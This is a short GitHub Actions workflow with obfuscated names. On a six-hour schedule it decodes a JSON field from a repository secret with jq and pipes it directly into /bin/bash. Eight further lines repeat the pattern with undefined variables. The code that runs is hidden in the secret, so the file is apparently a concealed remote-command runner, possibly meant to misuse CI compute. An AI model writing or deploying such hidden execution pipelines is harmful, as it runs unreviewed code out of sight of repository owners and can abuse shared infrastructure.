name: fengyuanchai4545
on:
  workflow_dispatch:
  schedule:
    - cron: '24 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fengyuanchai4545
        env:
          pmq919: ${{ secrets.pmq919 }}
        run: |
          echo $pmq919 | jq -r .xx671 | /bin/bash
          echo $wzs584 | jq -r .z6861 | /bin/bash
          echo $rxvd81176 | jq -r .uoubo49097 | /bin/bash
          echo $ra1747 | jq -r .mgr2 | /bin/bash
          echo $f20607 | jq -r .honfi04 | /bin/bash
          echo $afi47 | jq -r .nwvo2309 | /bin/bash
          echo $n41534 | jq -r .vn916 | /bin/bash
          echo $n37161 | jq -r .d8830 | /bin/bash
          echo $eqptp22124 | jq -r .spq7 | /bin/bash

